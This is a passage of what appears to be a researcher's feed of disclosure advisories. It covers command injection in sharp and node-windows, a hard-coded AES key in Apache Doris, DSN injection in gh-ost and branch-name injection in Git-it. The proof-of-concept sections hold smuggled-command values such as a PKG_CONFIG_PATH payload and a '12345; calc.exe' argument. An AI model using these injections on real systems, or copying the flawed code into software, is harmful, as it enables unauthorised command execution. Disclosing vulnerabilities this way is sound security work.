<span class="mi">67</span><span class="p">:</span> <span class="k">if</span> <span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">platform</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">win32</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span>
<span class="mi">68</span><span class="p">:</span> <span class="kd">const</span> <span class="nx">globalLibvipsVersion</span> <span class="o">=</span> <span class="nx">spawnSync</span><span class="p">(</span><span class="s2">`PKG_CONFIG_PATH="</span><span class="p">${</span><span class="nx">pkgConfigPath</span><span class="p">()}</span><span class="s2">" pkg-config --modversion vips-cpp`</span><span class="p">,</span> <span class="nx">spawnSyncOptions</span><span class="p">).</span><span class="nx">stdout</span><span class="p">;</span>
<span class="mi">69</span><span class="p">:</span> <span class="cm">/* istanbul ignore next */</span>
<span class="mi">70</span><span class="p">:</span> <span class="k">return</span> <span class="p">(</span><span class="nx">globalLibvipsVersion</span> <span class="o">||</span> <span class="dl">''</span><span class="p">).</span><span class="nx">trim</span><span class="p">();</span>
<span class="mi">71</span><span class="p">:</span> <span class="c1">// SNIPPED</span>
</code></pre></div></div>
<h3 id="occurrences">Occurrences</h3>
<p>Sink sort by backtrace.</p>
<ul>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/lib/libvips.js#L68">lib/libvips.js:<code class="language-plaintext highlighter-rouge">68</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/lib/libvips.js#L91">lib/libvips.js:<code class="language-plaintext highlighter-rouge">91</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/lib/libvips.js#L110">lib/libvips.js:<code class="language-plaintext highlighter-rouge">110</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/install/libvips.js#L112">install/libvips.js:<code class="language-plaintext highlighter-rouge">112</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/install/can-compile.js#L6">install/can-compile.js:<code class="language-plaintext highlighter-rouge">6</code></a></li>
<li><a href="https://github.com/lovell/sharp/blob/v0.30.4/package.json#L88">package.json:<code class="language-plaintext highlighter-rouge">88</code></a></li>
</ul>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>The vulnerable function was invoked during the post-installation of its package.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">export </span><span class="nv">PKG_CONFIG_PATH</span><span class="o">=</span><span class="s1">'"; touch pwned #'</span>
<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 0
<span class="nv">$ </span>npm <span class="nb">install </span>sharp <span class="nt">--silent</span>
sharp: Using cached /home/dw1/.npm/_libvips/libvips-8.12.2-linux-x64.tar.br
sharp: Integrity check passed <span class="k">for </span>linux-x64
+ sharp@0.30.4
added 67 packages from 204 contributors and audited 67 packages <span class="k">in </span>5.919s
8 packages are looking <span class="k">for </span>funding
run <span class="sb">`</span>npm fund<span class="sb">`</span> <span class="k">for </span>details
found 0 vulnerabilities
<span class="nv">$ </span>find <span class="nb">.</span> <span class="nt">-name</span> <span class="s2">"pwned"</span>
./node_modules/sharp/pwned
</code></pre></div></div>
<h2 id="impact">Impact</h2>
<p>This issue lead to a arbitrary command execution.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>20 May 2022: Ask the proper contact to disclose.</li>
<li>23 May 2022: Vulnerability reported to code owner.</li>
<li>23 May 2022: Report acknowledged & vulnerability patched.</li>
<li>25 May 2022: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/lovell/sharp/security/advisories/GHSA-gp95-ppv5-3jc5">GHSA-gp95-ppv5-3jc5</a></li>
<li><a href="https://github.com/lovell/sharp/commit/a6aeef612be50f5868a77481848b1de674216f0c">lovell/sharp@<code class="language-plaintext highlighter-rouge">a6aeef6</code></a></li>
</ul>dwisiswant0DescriptionCVE-2022-23942: Hard-coded Credentials in Apache Doris2022-03-10T00:00:00+00:002022-03-10T00:00:00+00:00/CVE-2022-23942<h2 id="description">Description</h2>
<p>Apache Doris use hardcoded key and IV to initialize the cipher used for LDAP password, which may lead to information disclosure.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>In <a href="https://github.com/apache/incubator-doris/blob/9ca369aa58ef6215e2c79b14fc1b4edfc2e2d720/fe/fe-core/src/main/java/org/apache/doris/common/util/SymmetricEncryption.java#L38-L48"><code class="language-plaintext highlighter-rouge">org.apache.doris.common.util.SymmetricEncryption</code></a> the cipher is initialized with a hardcoded
key and IV:</p>
<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">key</span> <span class="o">=</span> <span class="o">{</span> <span class="mh">0x56</span><span class="o">,</span> <span class="mh">0x73</span><span class="o">,</span> <span class="mh">0x36</span><span class="o">,</span> <span class="mh">0x68</span><span class="o">,</span> <span class="mh">0x4b</span><span class="o">,</span> <span class="mh">0x56</span><span class="o">,</span> <span class="mh">0x27</span><span class="o">,</span> <span class="mh">0x67</span><span class="o">,</span> <span class="mh">0x24</span><span class="o">,</span> <span class="mh">0x46</span><span class="o">,</span> <span class="mh">0x77</span><span class="o">,</span> <span class="mh">0x57</span><span class="o">,</span> <span class="mh">0x75</span><span class="o">,</span> <span class="mh">0x5a</span><span class="o">,</span>
<span class="mh">0x46</span><span class="o">,</span> <span class="mh">0x74</span> <span class="o">};</span>
<span class="kd">private</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">Cipher</span> <span class="nf">getCipher</span><span class="o">(</span><span class="kt">int</span> <span class="n">cipherMode</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">InvalidAlgorithmParameterException</span><span class="o">,</span>
<span class="nc">InvalidKeyException</span><span class="o">,</span> <span class="nc">NoSuchPaddingException</span><span class="o">,</span> <span class="nc">NoSuchAlgorithmException</span><span class="o">,</span> <span class="nc">UnsupportedEncodingException</span> <span class="o">{</span>
<span class="nc">Cipher</span> <span class="n">cipher</span> <span class="o">=</span> <span class="nc">Cipher</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"AES/CFB/PKCS5Padding"</span><span class="o">);</span>
<span class="kd">final</span> <span class="nc">SecretKeySpec</span> <span class="n">secretKey</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">SecretKeySpec</span><span class="o">(</span><span class="n">key</span><span class="o">,</span> <span class="s">"AES"</span><span class="o">);</span>
<span class="nc">IvParameterSpec</span> <span class="n">ivSpec</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">IvParameterSpec</span><span class="o">(</span><span class="s">"AAAAAAAAAAAAAAAA"</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(</span><span class="s">"UTF-8"</span><span class="o">));</span>
<span class="n">cipher</span><span class="o">.</span><span class="na">init</span><span class="o">(</span><span class="n">cipherMode</span><span class="o">,</span> <span class="n">secretKey</span><span class="o">,</span> <span class="n">ivSpec</span><span class="o">);</span>
<span class="k">return</span> <span class="n">cipher</span><span class="o">;</span>
<span class="o">}</span>
</code></pre></div></div>
<h2 id="timeline">Timeline</h2>
<ul>
<li>14 Jan 2022: Vulnerability reported.</li>
<li>14 Jan 2022: Apache Security Team acknowledged the report.</li>
<li>28 Jan 2022: Vulnerability fixed & announcement drafted.</li>
<li>28 Feb 2022: No updates.</li>
<li>10 Mar 2022: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/apache/incubator-doris/pull/7862">apache/incubator-doris#7862</a></li>
</ul>dwisiswant0DescriptionCVE-2022-21687: DSN Injection in gh-ost2022-01-31T00:00:00+00:002022-01-31T00:00:00+00:00/CVE-2022-21687<h2 id="description">Description</h2>
<p>gh-ost is a triggerless online schema migration solution for MySQL. Versions prior to 1.1.3 are subject to an arbitrary file read vulnerability. The attacker must have access to the target host or trick an administrator into executing a malicious gh-ost command on a host running gh-ost, plus network access from host running gh-ost to the attack’s malicious MySQL server. The <code class="language-plaintext highlighter-rouge">-database</code> parameter does not properly sanitize user input which can lead to arbitrary file reads.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>Vulnerable code: <a href="https://github.com/github/gh-ost/blob/40acde022213c98a09e7f01cc18adf79fafd0170/go/mysql/connection.go#L122">go/mysql/connection.go:122</a></p>
<p><img src="https://i.ibb.co/YP05qcr/gh-ost-sqli.gif" alt="PoC" /></p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/github/gh-ost/security/advisories/GHSA-rrp4-2xx3-mv29">GHSA-rrp4-2xx3-mv29</a></li>
</ul>dwisiswant0DescriptionCVE-2021-45459: OS Command Injection in node-windows2021-12-23T00:00:00+00:002021-12-23T00:00:00+00:00/CVE-2021-45459<h2 id="description">Description</h2>
<p><code class="language-plaintext highlighter-rouge">lib/cmd.js</code> in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// poc.js</span>
<span class="kd">var</span> <span class="nx">wincmd</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">node-windows</span><span class="dl">'</span><span class="p">);</span>
<span class="nx">wincmd</span><span class="p">.</span><span class="nx">kill</span><span class="p">(</span><span class="dl">"</span><span class="s2">12345; calc.exe</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(){</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Process Killed</span><span class="dl">'</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div></div>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/advisories/GHSA-53xv-c2hx-5w6q">GHSA-53xv-c2hx-5w6q</a></li>
<li><a href="https://github.com/coreybutler/node-windows/compare/1.0.0-beta.5...1.0.0-beta.6">coreybutler/node-windows@<code class="language-plaintext highlighter-rouge">1.0.0-beta.5...1.0.0-beta.6</code></a></li>
</ul>dwisiswant0DescriptionCVE-2021-44685: OS Command Injection in Git-it2021-12-07T00:00:00+00:002021-12-07T00:00:00+00:00/CVE-2021-44685<h2 id="description">Description</h2>
<p>Git-it through 4.4.0 allows OS command injection at the <strong>Branches Aren’t Just For Birds</strong> challenge step. During the verification process, it attempts to run the <code class="language-plaintext highlighter-rouge">reflog</code> command followed by the current branch name (which is not sanitized for execution).</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p><img src="/assets/images/CVE-2021-44685.gif" alt="" /></p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/advisories/GHSA-wjqc-j537-j9gj">GHSA-wjqc-j537-j9gj</a></li>
<li><a href="https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4">https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4</a></li>
</ul>dwisiswant0Description